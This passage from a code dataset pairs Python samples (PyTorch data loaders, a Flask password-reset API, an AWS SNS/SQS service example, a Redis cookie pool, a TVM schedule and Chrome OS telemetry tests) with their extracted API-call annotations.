[((837, 946), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.train_inputs', 'self.german_data.train_masks', 'self.german_data.train_labels'], {}), '(self.german_data.train_inputs, self.german_data.train_masks,\n self.german_data.train_labels)\n', (850, 946), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1019, 1044), 'torch.utils.data.RandomSampler', 'RandomSampler', (['train_data'], {}), '(train_data)\n', (1032, 1044), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1078, 1151), 'torch.utils.data.DataLoader', 'DataLoader', (['train_data'], {'sampler': 'train_sampler', 'batch_size': 'self.batch_size'}), '(train_data, sampler=train_sampler, batch_size=self.batch_size)\n', (1088, 1151), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1205, 1330), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.validation_inputs', 'self.german_data.validation_masks', 'self.german_data.validation_labels'], {}), '(self.german_data.validation_inputs, self.german_data.\n validation_masks, self.german_data.validation_labels)\n', (1218, 1330), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1407, 1441), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['validation_data'], {}), '(validation_data)\n', (1424, 1441), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1480, 1568), 'torch.utils.data.DataLoader', 'DataLoader', (['validation_data'], {'sampler': 'validation_sampler', 'batch_size': 'self.batch_size'}), '(validation_data, sampler=validation_sampler, batch_size=self.\n batch_size)\n', (1490, 1568), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1611, 1717), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.test_inputs', 'self.german_data.test_masks', 'self.german_data.test_labels'], {}), '(self.german_data.test_inputs, self.german_data.test_masks,\n self.german_data.test_labels)\n', (1624, 1717), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1789, 1817), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['test_data'], {}), '(test_data)\n', (1806, 1817), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1850, 1921), 'torch.utils.data.DataLoader', 'DataLoader', (['test_data'], {'sampler': 'test_sampler', 'batch_size': 'self.batch_size'}), '(test_data, sampler=test_sampler, batch_size=self.batch_size)\n', (1860, 1921), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n')]
# -*- coding: utf-8 -*- import logging import datetime from flask import request, render_template from flask_jwt_extended import ( create_access_token, decode_token ) from jwt.exceptions import DecodeError from flasgger import swag_from from http import HTTPStatus from pathlib import Path from sqlalchemy.orm.exc import NoResultFound from vantage6.common import logger_name from vantage6.server import db from vantage6.server.resource import ( ServicesResources ) module_name = logger_name(__name__) log = logging.getLogger(module_name) def setup(api, api_base, services): path = "/".join([api_base, module_name]) log.info(f'Setting up "{path}" and subdirectories') api.add_resource( ResetPassword, path+'/reset', endpoint="reset_password", methods=('POST',), resource_class_kwargs=services ) api.add_resource( RecoverPassword, path+'/lost', endpoint='recover_password', methods=('POST',), resource_class_kwargs=services ) # ------------------------------------------------------------------------------ # Resources / API's # ------------------------------------------------------------------------------ class ResetPassword(ServicesResources): """user can use recover token to reset their password.""" @swag_from(str(Path(r"swagger/post_reset_password.yaml")), endpoint='reset_password') def post(self): """"submit email-adress receive token.""" # retrieve user based on email or username body = request.get_json() reset_token = body.get("reset_token") password = body.get("password") if not reset_token or not password: return {"msg": "reset token and/or password is missing!"}, \ HTTPStatus.BAD_REQUEST # obtain user try: user_id = decode_token(reset_token)['identity'].get('id') except DecodeError: return {"msg": "Invalid recovery token!"}, HTTPStatus.BAD_REQUEST log.debug(user_id) user = db.User.get(user_id) # set password user.set_password(password) user.save() log.info(f"Successfull password reset for '{user.username}'") return {"msg": "password successfully been reset!"}, \ HTTPStatus.OK class RecoverPassword(ServicesResources): """send a mail containing a recover token""" @swag_from(str(Path(r"swagger/post_recover_password.yaml")), endpoint='recover_password') def post(self): """username or email generates a token which is mailed.""" # default return string ret = {"msg": "If the username or email is our database you " "will soon receive an email"} # obtain username/email from request' body = request.get_json() username = body.get("username") email = body.get("email") if not (email or username): return {"msg": "No username or email provided!"}, \ HTTPStatus.BAD_REQUEST # find user in the database, if not here we stop! try: if username: user = db.User.get_by_username(username) else: user = db.User.get_by_email(email) except NoResultFound: # we do not tell them.... But we won't continue either return ret log.info(f"Password reset requested for '{user.username}'") # generate a token that can reset their password expires = datetime.timedelta(hours=1) reset_token = create_access_token( {"id": str(user.id)}, expires_delta=expires ) self.mail.send_email( "password reset", sender="<EMAIL>", recipients=[user.email], text_body=render_template("mail/reset_password_token.txt", token=reset_token), html_body=render_template("mail/reset_password_token.html", token=reset_token) ) return ret
[ "logging.getLogger", "flask.render_template", "vantage6.server.db.User.get", "vantage6.server.db.User.get_by_email", "pathlib.Path", "vantage6.server.db.User.get_by_username", "flask_jwt_extended.decode_token", "flask.request.get_json", "vantage6.common.logger_name", "datetime.timedelta" ]
[((494, 515), 'vantage6.common.logger_name', 'logger_name', (['__name__'], {}), '(__name__)\n', (505, 515), False, 'from vantage6.common import logger_name\n'), ((522, 552), 'logging.getLogger', 'logging.getLogger', (['module_name'], {}), '(module_name)\n', (539, 552), False, 'import logging\n'), ((1577, 1595), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (1593, 1595), False, 'from flask import request, render_template\n'), ((2094, 2114), 'vantage6.server.db.User.get', 'db.User.get', (['user_id'], {}), '(user_id)\n', (2105, 2114), False, 'from vantage6.server import db\n'), ((2862, 2880), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (2878, 2880), False, 'from flask import request, render_template\n'), ((3582, 3609), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (3600, 3609), False, 'import datetime\n'), ((1354, 1394), 'pathlib.Path', 'Path', (['"""swagger/post_reset_password.yaml"""'], {}), "('swagger/post_reset_password.yaml')\n", (1358, 1394), False, 'from pathlib import Path\n'), ((2468, 2510), 'pathlib.Path', 'Path', (['"""swagger/post_recover_password.yaml"""'], {}), "('swagger/post_recover_password.yaml')\n", (2472, 2510), False, 'from pathlib import Path\n'), ((3214, 3247), 'vantage6.server.db.User.get_by_username', 'db.User.get_by_username', (['username'], {}), '(username)\n', (3237, 3247), False, 'from vantage6.server import db\n'), ((3289, 3316), 'vantage6.server.db.User.get_by_email', 'db.User.get_by_email', (['email'], {}), '(email)\n', (3309, 3316), False, 'from vantage6.server import db\n'), ((3869, 3936), 'flask.render_template', 'render_template', (['"""mail/reset_password_token.txt"""'], {'token': 'reset_token'}), "('mail/reset_password_token.txt', token=reset_token)\n", (3884, 3936), False, 'from flask import request, render_template\n'), ((3998, 4066), 'flask.render_template', 'render_template', (['"""mail/reset_password_token.html"""'], {'token': 'reset_token'}), "('mail/reset_password_token.html', token=reset_token)\n", (4013, 4066), False, 'from flask import request, render_template\n'), ((1897, 1922), 'flask_jwt_extended.decode_token', 'decode_token', (['reset_token'], {}), '(reset_token)\n', (1909, 1922), False, 'from flask_jwt_extended import create_access_token, decode_token\n')]
import os
from typing import Any, Callable, Dict

import tomodachi
from tomodachi import aws_sns_sqs, aws_sns_sqs_publish
from tomodachi.discovery import AWSSNSRegistration
from tomodachi.envelope import JsonBase


async def middleware_function(
    func: Callable, service: Any, message: Any, topic: str, context: Dict, *args: Any, **kwargs: Any
) -> Any:
    # Functionality before function is called
    service.log("middleware before")

    return_value = await func(*args, **kwargs)

    # There's also the possibility to pass in extra arguments or keyword arguments, for example:
    # return_value = await func(*args, id='overridden', **kwargs)

    # Functionality after function is called
    service.log("middleware after")

    return return_value


class ExampleAWSSNSSQSService(tomodachi.Service):
    name = "example-aws-sns-sqs-service"
    log_level = "INFO"
    uuid = str(os.environ.get("SERVICE_UUID") or "")

    # Build own "discovery" functions, to be run on start and stop
    # See tomodachi/discovery/aws_sns_registration.py for example
    discovery = [AWSSNSRegistration]

    # The message envelope class defines how a message should be processed when sent and received
    # See tomodachi/envelope/json_base.py for a basic example using JSON and transferring some metadata
    message_envelope = JsonBase

    # Adds a middleware function that is run on every incoming message.
    # Several middlewares can be chained.
    message_middleware = [middleware_function]

    # Some options can be specified to define credentials, used ports, hostnames, access log, etc.
    options = {
        "aws_sns_sqs": {
            "region_name": None,  # specify AWS region (example: 'eu-west-1')
            "aws_access_key_id": None,  # specify AWS access key (example: '<KEY>')
            "aws_secret_access_key": None,  # specify AWS secret key (example: 'f7sha92hNotarealsecretkeyn29ShnSYQi3nzgA')
        },
        "aws_endpoint_urls": {
            "sns": None,  # For example 'http://localhost:4575' if localstack is used for testing
            "sqs": None,  # For example 'http://localhost:4576' if localstack is used for testing
        },
    }

    @aws_sns_sqs("example-route1")
    async def route1a(self, data: Any) -> None:
        self.log('Received data (function: route1a) - "{}"'.format(data))

    async def _started_service(self) -> None:
        async def publish(data: Any, topic: str) -> None:
            self.log('Publish data "{}"'.format(data))
            await aws_sns_sqs_publish(self, data, topic=topic, wait=False)

        await publish("友達", "example-route1")
[ "tomodachi.aws_sns_sqs_publish", "os.environ.get", "tomodachi.aws_sns_sqs" ]
[((2184, 2213), 'tomodachi.aws_sns_sqs', 'aws_sns_sqs', (['"""example-route1"""'], {}), "('example-route1')\n", (2195, 2213), False, 'from tomodachi import aws_sns_sqs, aws_sns_sqs_publish\n'), ((891, 921), 'os.environ.get', 'os.environ.get', (['"""SERVICE_UUID"""'], {}), "('SERVICE_UUID')\n", (905, 921), False, 'import os\n'), ((2514, 2570), 'tomodachi.aws_sns_sqs_publish', 'aws_sns_sqs_publish', (['self', 'data'], {'topic': 'topic', 'wait': '(False)'}), '(self, data, topic=topic, wait=False)\n', (2533, 2570), False, 'from tomodachi import aws_sns_sqs, aws_sns_sqs_publish\n')]
# -*- coding: utf-8 -*-
# @Author: GXR
# @CreateTime: 2022-01-20
# @UpdateTime: 2022-01-20
import redis

import config
import cookie_login
from cookie_api import app

red = redis.Redis(
    host=config.REDIS_HOST,
    port=config.REDIS_PORT,
    db=config.REDIS_DB,
    decode_responses=True,
)


# Top up the cookie pool until it holds at least COOKIE_COUNT entries
def cookie_refresh():
    while 1:
        cookie_list = red.smembers(config.REDIS_KEY_COOKIE)
        if len(cookie_list) >= config.COOKIE_COUNT:
            break
        cookie_login.run_cookie_login(1)
    app.logger.info("[cookie数量正常]-[%s]" % len(cookie_list))


def run_cookie_refresh():
    cookie_refresh()


if __name__ == "__main__":
    run_cookie_refresh()
[ "cookie_login.run_cookie_login", "redis.Redis" ]
[((174, 281), 'redis.Redis', 'redis.Redis', ([], {'host': 'config.REDIS_HOST', 'port': 'config.REDIS_PORT', 'db': 'config.REDIS_DB', 'decode_responses': '(True)'}), '(host=config.REDIS_HOST, port=config.REDIS_PORT, db=config.\n REDIS_DB, decode_responses=True)\n', (185, 281), False, 'import redis\n'), ((484, 516), 'cookie_login.run_cookie_login', 'cookie_login.run_cookie_login', (['(1)'], {}), '(1)\n', (513, 516), False, 'import cookie_login\n')]
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

# start tutorial
from django.db import models
from djng.forms import NgModelFormMixin, NgFormValidationMixin
from djng.styling.bootstrap3.forms import Bootstrap3ModelForm


class SubscribeUser(models.Model):
    full_name = models.CharField(
        "<NAME>",
        max_length=99)

    avatar = models.ImageField("Avatar", blank=False, null=True)

    permit = models.FileField("Permit", blank=True, null=True)


class SubscribeForm(NgModelFormMixin, NgFormValidationMixin, Bootstrap3ModelForm):
    use_required_attribute = False
    scope_prefix = 'subscribe_data'
    form_name = 'my_form'

    class Meta:
        model = SubscribeUser
        fields = ['full_name', 'avatar', 'permit']
[ "django.db.models.ImageField", "django.db.models.FileField", "django.db.models.CharField" ]
[((288, 329), 'django.db.models.CharField', 'models.CharField', (['"""<NAME>"""'], {'max_length': '(99)'}), "('<NAME>', max_length=99)\n", (304, 329), False, 'from django.db import models\n'), ((361, 412), 'django.db.models.ImageField', 'models.ImageField', (['"""Avatar"""'], {'blank': '(False)', 'null': '(True)'}), "('Avatar', blank=False, null=True)\n", (378, 412), False, 'from django.db import models\n'), ((427, 476), 'django.db.models.FileField', 'models.FileField', (['"""Permit"""'], {'blank': '(True)', 'null': '(True)'}), "('Permit', blank=True, null=True)\n", (443, 476), False, 'from django.db import models\n')]
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name

"""Compute and schedule for add, multiply, subtract slice op

Please note the following assumptions made by the implementation:

1) The inputs will be multiple of crouton layout except for the axis that
   needs broadcasting."""

from tvm import te
from tvm import tir
from tvm import topi

from ..utils import get_layout_transform_fn


def add_broadcast_compute(input_a, input_b):
    """Call the add op from topi"""
    return topi.add(input_a, input_b)


def subtract_broadcast_compute(input_a, input_b):
    """Call the subtract op from topi"""
    return topi.subtract(input_a, input_b)


def multiply_broadcast_compute(input_a, input_b):
    """Call the multiply op from topi"""
    return topi.multiply(input_a, input_b)


def tir_broadcast_schedule(
    out_m,
    input_a,
    input_b,
    output_layout: str,
    input_a_layout: str,
    input_b_layout: str,
    op_name: str,
):
    """Schedule for input and output layout nhwc-8h2w32c2w-2d considering broadcast"""
    func = te.create_prim_func([input_a, input_b, out_m])

    s = tir.Schedule(func)

    block_dict = {"add": "T_add", "subtract": "T_subtract", "multiply": "T_multiply"}

    block = s.get_block(block_dict[op_name])

    if input_a_layout == "nhwc-8h2w32c2w-2d":
        input_a_transformed_layout = get_layout_transform_fn(input_a_layout)
        s.transform_layout(block, buffer=("read", 0), index_map=input_a_transformed_layout)

    if input_b_layout == "nhwc-8h2w32c2w-2d":
        input_b_transformed_layout = get_layout_transform_fn(input_b_layout)
        s.transform_layout(block, buffer=("read", 1), index_map=input_b_transformed_layout)

    output_transformed_layout = get_layout_transform_fn(output_layout)
    s.transform_layout(block, buffer=("write", 0), index_map=output_transformed_layout)

    n, h, w, c = s.get_loops(block)

    h_o, h_i = s.split(h, [None, 8])
    w_o, w_i = s.split(w, [None, 4])
    c_o, c_i = s.split(c, [None, 32])
    wio, wii = s.split(w_i, [None, 2])

    s.reorder(n, h_o, w_o, c_o, h_i, wio, c_i, wii)

    fused = s.fuse(c_i, wii)
    s.vectorize(fused)

    return s
[ "tvm.topi.add", "tvm.tir.Schedule", "tvm.te.create_prim_func", "tvm.topi.subtract", "tvm.topi.multiply" ]
[((1274, 1300), 'tvm.topi.add', 'topi.add', (['input_a', 'input_b'], {}), '(input_a, input_b)\n', (1282, 1300), False, 'from tvm import topi\n'), ((1410, 1441), 'tvm.topi.subtract', 'topi.subtract', (['input_a', 'input_b'], {}), '(input_a, input_b)\n', (1423, 1441), False, 'from tvm import topi\n'), ((1551, 1582), 'tvm.topi.multiply', 'topi.multiply', (['input_a', 'input_b'], {}), '(input_a, input_b)\n', (1564, 1582), False, 'from tvm import topi\n'), ((1856, 1902), 'tvm.te.create_prim_func', 'te.create_prim_func', (['[input_a, input_b, out_m]'], {}), '([input_a, input_b, out_m])\n', (1875, 1902), False, 'from tvm import te\n'), ((1914, 1932), 'tvm.tir.Schedule', 'tir.Schedule', (['func'], {}), '(func)\n', (1926, 1932), False, 'from tvm import tir\n')]
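A minimal usage sketch for the helpers above, assuming two placeholder tensors whose shapes are made up for illustration; the layout strings mirror the ones the schedule checks for, and the shape respects the crouton-layout multiples noted in the module docstring.

# Hypothetical wiring of the compute and schedule helpers defined above.
from tvm import te

A = te.placeholder((1, 8, 8, 32), name="A", dtype="float16")  # made-up shape
B = te.placeholder((1, 8, 8, 32), name="B", dtype="float16")

out = add_broadcast_compute(A, B)
sched = tir_broadcast_schedule(
    out, A, B,
    output_layout="nhwc-8h2w32c2w-2d",
    input_a_layout="nhwc-8h2w32c2w-2d",
    input_b_layout="nhwc-8h2w32c2w-2d",
    op_name="add",
)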
# Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import json import logging import os import unittest from telemetry.core import browser_finder from telemetry.core import exceptions from telemetry.core import extension_to_load from telemetry.core import util from telemetry.core.backends.chrome import cros_interface from telemetry.unittest import options_for_unittests class CrOSAutoTest(unittest.TestCase): def setUp(self): options = options_for_unittests.GetCopy() self._cri = cros_interface.CrOSInterface(options.cros_remote, options.cros_ssh_identity) self._is_guest = options.browser_type == 'cros-chrome-guest' self._username = '' if self._is_guest else options.browser_options.username self._password = options.browser_options.password def _IsCryptohomeMounted(self): """Returns True if cryptohome is mounted""" cryptohomeJSON, _ = self._cri.RunCmdOnDevice(['/usr/sbin/cryptohome', '--action=status']) cryptohomeStatus = json.loads(cryptohomeJSON) return (cryptohomeStatus['mounts'] and cryptohomeStatus['mounts'][0]['mounted']) def _CreateBrowser(self, autotest_ext=False, auto_login=True): """Finds and creates a browser for tests. if autotest_ext is True, also loads the autotest extension""" options = options_for_unittests.GetCopy() if autotest_ext: extension_path = os.path.join(os.path.dirname(__file__), 'autotest_ext') self._load_extension = extension_to_load.ExtensionToLoad( path=extension_path, browser_type=options.browser_type, is_component=True) options.extensions_to_load = [self._load_extension] browser_to_create = browser_finder.FindBrowser(options) self.assertTrue(browser_to_create) options.browser_options.create_browser_with_oobe = True options.browser_options.auto_login = auto_login b = browser_to_create.Create() b.Start() return b def _GetAutotestExtension(self, browser): """Returns the autotest extension instance""" extension = browser.extensions[self._load_extension] self.assertTrue(extension) return extension def _GetLoginStatus(self, browser): extension = self._GetAutotestExtension(browser) self.assertTrue(extension.EvaluateJavaScript( "typeof('chrome.autotestPrivate') != 'undefined'")) extension.ExecuteJavaScript(''' window.__login_status = null; chrome.autotestPrivate.loginStatus(function(s) { window.__login_status = s; }); ''') return util.WaitFor( lambda: extension.EvaluateJavaScript('window.__login_status'), 10) def testCryptohomeMounted(self): """Verifies cryptohome mount status for regular and guest user and when logged out""" with self._CreateBrowser() as b: self.assertEquals(1, len(b.tabs)) self.assertTrue(b.tabs[0].url) self.assertTrue(self._IsCryptohomeMounted()) chronos_fs = self._cri.FilesystemMountedAt('/home/chronos/user') self.assertTrue(chronos_fs) if self._is_guest: self.assertEquals(chronos_fs, 'guestfs') else: home, _ = self._cri.RunCmdOnDevice(['/usr/sbin/cryptohome-path', 'user', self._username]) self.assertEquals(self._cri.FilesystemMountedAt(home.rstrip()), chronos_fs) self.assertFalse(self._IsCryptohomeMounted()) self.assertEquals(self._cri.FilesystemMountedAt('/home/chronos/user'), '/dev/mapper/encstateful') def testLoginStatus(self): """Tests autotestPrivate.loginStatus""" with self._CreateBrowser(autotest_ext=True) as b: login_status = self._GetLoginStatus(b) self.assertEquals(type(login_status), dict) self.assertEquals(not self._is_guest, login_status['isRegularUser']) self.assertEquals(self._is_guest, login_status['isGuest']) 
self.assertEquals(login_status['email'], self._username) self.assertFalse(login_status['isScreenLocked']) def _IsScreenLocked(self, browser): return self._GetLoginStatus(browser)['isScreenLocked'] def _LockScreen(self, browser): self.assertFalse(self._IsScreenLocked(browser)) extension = self._GetAutotestExtension(browser) self.assertTrue(extension.EvaluateJavaScript( "typeof chrome.autotestPrivate.lockScreen == 'function'")) logging.info('Locking screen') extension.ExecuteJavaScript('chrome.autotestPrivate.lockScreen();') logging.info('Waiting for the lock screen') def ScreenLocked(): return (browser.oobe and browser.oobe.EvaluateJavaScript("typeof Oobe == 'function'") and browser.oobe.EvaluateJavaScript( "typeof Oobe.authenticateForTesting == 'function'")) util.WaitFor(ScreenLocked, 10) self.assertTrue(self._IsScreenLocked(browser)) def _AttemptUnlockBadPassword(self, browser): logging.info('Trying a bad password') def ErrorBubbleVisible(): return not browser.oobe.EvaluateJavaScript(''' document.getElementById('bubble').hidden ''') self.assertFalse(ErrorBubbleVisible()) browser.oobe.ExecuteJavaScript(''' Oobe.authenticateForTesting('%s', 'bad'); ''' % self._username) util.WaitFor(ErrorBubbleVisible, 10) self.assertTrue(self._IsScreenLocked(browser)) def _UnlockScreen(self, browser): logging.info('Unlocking') browser.oobe.ExecuteJavaScript(''' Oobe.authenticateForTesting('%s', '%s'); ''' % (self._username, self._password)) util.WaitFor(lambda: not browser.oobe, 10) self.assertFalse(self._IsScreenLocked(browser)) def testScreenLock(self): """Tests autotestPrivate.screenLock""" with self._CreateBrowser(autotest_ext=True) as browser: self._LockScreen(browser) self._AttemptUnlockBadPassword(browser) self._UnlockScreen(browser) def testLogout(self): """Tests autotestPrivate.logout""" with self._CreateBrowser(autotest_ext=True) as b: extension = self._GetAutotestExtension(b) try: extension.ExecuteJavaScript('chrome.autotestPrivate.logout();') except (exceptions.BrowserConnectionGoneException, exceptions.BrowserGoneException): pass util.WaitFor(lambda: not self._IsCryptohomeMounted(), 20) def _SwitchRegion(self, region): self._cri.RunCmdOnDevice(['stop', 'ui']) # Change VPD (requires RW-enabled firmware). # To save time, region and initial_timezone are not set. vpd = {'initial_locale': region.language_code, 'keyboard_layout': region.keyboard} for (key, value) in vpd.items(): self._cri.RunCmdOnDevice(['vpd', '-s', '"%s"="%s"' % (key, value)]) # Remove cached files to clear initial locale info and force regeneration. self._cri.RunCmdOnDevice(['rm', '/home/chronos/Local\ State']) self._cri.RunCmdOnDevice(['rm', '/home/chronos/.oobe_completed']) self._cri.RunCmdOnDevice(['dump_vpd_log', '--force']) self._cri.RunCmdOnDevice(['start', 'ui']) def _OobeHasOption(self, browser, selectId, value): hasOptionJs = ''' // Check that the option is present, and selected if it is the default. (function hasOption(selectId, value, isDefault) { var options = document.getElementById(selectId).options; for (var i = 0; i < options.length; i++) { if (options[i].value == value) { // The option is present. Make sure it's selected if necessary. return !isDefault || options.selectedIndex == i; } } return false; })("%s", "%s", %s); ''' return browser.oobe.EvaluateJavaScript( hasOptionJs % (selectId, value, 'true')) def _ResolveLanguage(self, locale): # If the locale matches a language but not the country, fall back to # an existing locale. See ui/base/l10n/l10n_util.cc. 
lang, _, region = map(str.lower, locale.partition('-')) if not region: return "" # Map from other countries to a localized country if lang == 'es' and region == 'es': return 'es-419' if lang == 'zh': if region in ('hk', 'mo'): return 'zh-TW' return 'zh-CN' if lang == 'en': if region in ('au', 'ca', 'nz', 'za'): return 'en-GB' return 'en-US' # No mapping found return "" def testOobeLocalization(self): """Tests different region configurations at OOBE""" # Save the original device localization settings. # To save time, only read initial_locale and keyboard_layout. initial_region = self.Region('', '', '', '', '') initial_region.language_code, _ = self._cri.RunCmdOnDevice( ['vpd', '-g', 'initial_locale']) initial_region.keyboard, _ = self._cri.RunCmdOnDevice( ['vpd', '-g', 'keyboard_layout']) for region in self.REGIONS_LIST: self._SwitchRegion(region) with self._CreateBrowser(auto_login=False) as browser: # Ensure the dropdown lists have been created. util.WaitFor(lambda: browser.oobe.EvaluateJavaScript( 'document.getElementById("language-select") != null'), 10) # Find the language, or an acceptable fallback value. languageFound = self._OobeHasOption(browser, 'language-select', region.language_code) if not languageFound: fallback = self._ResolveLanguage(region.language_code) self.assertTrue(fallback and self._OobeHasOption(browser, 'language-select', fallback)) # Find the keyboard layout. self.assertTrue(self._OobeHasOption( browser, 'keyboard-select', region.keyboard)) # Test is finished. Restore original region settings. self._SwitchRegion(initial_region) # The Region class and region list will be available in regions.py. class Region(object): def __init__(self, region_code, keyboard, time_zone, language_code, keyboard_mechanical_layout, description=None, notes=None): self.region_code = region_code self.keyboard = keyboard self.time_zone = time_zone self.language_code = language_code self.keyboard_mechanical_layout = keyboard_mechanical_layout self.description = description or region_code self.notes = notes class Enum(frozenset): def __getattr__(self, name): if name in self: return name raise AttributeError KeyboardMechanicalLayout = Enum(['ANSI', 'ISO', 'JIS', 'ABNT2']) _KML = KeyboardMechanicalLayout REGIONS_LIST = [ Region('au', 'xkb:us::eng', 'Australia/Sydney', 'en-AU', _KML.ANSI, 'Australia'), Region('ca.ansi', 'xkb:us::eng', 'America/Toronto', 'en-CA', _KML.ANSI, 'Canada (US keyboard)', 'Canada with US (ANSI) keyboard; see http://goto/cros-canada'), Region('ca.fr', 'xkb:ca::fra', 'America/Toronto', 'fr-CA', _KML.ISO, 'Canada (French keyboard)', ('Canadian French (ISO) keyboard. The most common configuration for ' 'Canadian French SKUs. See http://goto/cros-canada')), Region('ca.hybrid', 'xkb:ca:eng:eng', 'America/Toronto', 'en-CA', _KML.ISO, 'Canada (hybrid)', ('Canada with hybrid xkb:ca:eng:eng + xkb:ca::fra keyboard (ISO), ' 'defaulting to English language and keyboard. Used only if there ' 'needs to be a single SKU for all of Canada. See ' 'http://goto/cros-canada')), Region('ca.multix', 'xkb:ca:multix:fra', 'America/Toronto', 'fr-CA', _KML.ISO, 'Canada (multilingual)', ("Canadian Multilingual keyboard; you probably don't want this. 
See " "http://goto/cros-canada")), Region('de', 'xkb:de::ger', 'Europe/Berlin', 'de', _KML.ISO, 'Germany'), Region('fi', 'xkb:fi::fin', 'Europe/Helsinki', 'fi', _KML.ISO, 'Finland'), Region('fr', 'xkb:fr::fra', 'Europe/Paris', 'fr', _KML.ISO, 'France'), Region('gb', 'xkb:gb:extd:eng', 'Europe/London', 'en-GB', _KML.ISO, 'UK'), Region('ie', 'xkb:gb:extd:eng', 'Europe/Dublin', 'en-GB', _KML.ISO, 'Ireland'), Region('in', 'xkb:us::eng', 'Asia/Calcutta', 'en-US', _KML.ANSI, 'India'), Region('my', 'xkb:us::eng', 'Asia/Kuala_Lumpur', 'ms', _KML.ANSI, 'Malaysia'), Region('nl', 'xkb:us:intl:eng', 'Europe/Amsterdam', 'nl', _KML.ANSI, 'Netherlands'), Region('nordic', 'xkb:se::swe', 'Europe/Stockholm', 'en-US', _KML.ISO, 'Nordics', ('Unified SKU for Sweden, Norway, and Denmark. This defaults ' 'to Swedish keyboard layout, but starts with US English language ' 'for neutrality. Use if there is a single combined SKU for Nordic ' 'countries.')), Region('se', 'xkb:se::swe', 'Europe/Stockholm', 'sv', _KML.ISO, 'Sweden', ("Use this if there separate SKUs for Nordic countries (Sweden, " "Norway, and Denmark), or the device is only shipping to Sweden. " "If there is a single unified SKU, use 'nordic' instead.")), Region('sg', 'xkb:us::eng', 'Asia/Singapore', 'en-GB', _KML.ANSI, 'Singapore'), Region('us', 'xkb:us::eng', 'America/Los_Angeles', 'en-US', _KML.ANSI, 'United States'), ]
[ "json.loads", "telemetry.core.browser_finder.FindBrowser", "telemetry.core.backends.chrome.cros_interface.CrOSInterface", "telemetry.core.util.WaitFor", "os.path.dirname", "telemetry.unittest.options_for_unittests.GetCopy", "telemetry.core.extension_to_load.ExtensionToLoad", "logging.info" ]
[((561, 592), 'telemetry.unittest.options_for_unittests.GetCopy', 'options_for_unittests.GetCopy', ([], {}), '()\n', (590, 592), False, 'from telemetry.unittest import options_for_unittests\n'), ((609, 685), 'telemetry.core.backends.chrome.cros_interface.CrOSInterface', 'cros_interface.CrOSInterface', (['options.cros_remote', 'options.cros_ssh_identity'], {}), '(options.cros_remote, options.cros_ssh_identity)\n', (637, 685), False, 'from telemetry.core.backends.chrome import cros_interface\n'), ((1179, 1205), 'json.loads', 'json.loads', (['cryptohomeJSON'], {}), '(cryptohomeJSON)\n', (1189, 1205), False, 'import json\n'), ((1495, 1526), 'telemetry.unittest.options_for_unittests.GetCopy', 'options_for_unittests.GetCopy', ([], {}), '()\n', (1524, 1526), False, 'from telemetry.unittest import options_for_unittests\n'), ((1880, 1915), 'telemetry.core.browser_finder.FindBrowser', 'browser_finder.FindBrowser', (['options'], {}), '(options)\n', (1906, 1915), False, 'from telemetry.core import browser_finder\n'), ((4602, 4632), 'logging.info', 'logging.info', (['"""Locking screen"""'], {}), "('Locking screen')\n", (4614, 4632), False, 'import logging\n'), ((4714, 4757), 'logging.info', 'logging.info', (['"""Waiting for the lock screen"""'], {}), "('Waiting for the lock screen')\n", (4726, 4757), False, 'import logging\n'), ((5010, 5040), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['ScreenLocked', '(10)'], {}), '(ScreenLocked, 10)\n', (5022, 5040), False, 'from telemetry.core import util\n'), ((5149, 5186), 'logging.info', 'logging.info', (['"""Trying a bad password"""'], {}), "('Trying a bad password')\n", (5161, 5186), False, 'import logging\n'), ((5512, 5548), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['ErrorBubbleVisible', '(10)'], {}), '(ErrorBubbleVisible, 10)\n', (5524, 5548), False, 'from telemetry.core import util\n'), ((5645, 5670), 'logging.info', 'logging.info', (['"""Unlocking"""'], {}), "('Unlocking')\n", (5657, 5670), False, 'import logging\n'), ((5815, 5858), 'telemetry.core.util.WaitFor', 'util.WaitFor', (['(lambda : not browser.oobe)', '(10)'], {}), '(lambda : not browser.oobe, 10)\n', (5827, 5858), False, 'from telemetry.core import util\n'), ((1657, 1770), 'telemetry.core.extension_to_load.ExtensionToLoad', 'extension_to_load.ExtensionToLoad', ([], {'path': 'extension_path', 'browser_type': 'options.browser_type', 'is_component': '(True)'}), '(path=extension_path, browser_type=options\n .browser_type, is_component=True)\n', (1690, 1770), False, 'from telemetry.core import extension_to_load\n'), ((1585, 1610), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1600, 1610), False, 'import os\n')]
import sqlite3


class Database:
    def get_connection(self):
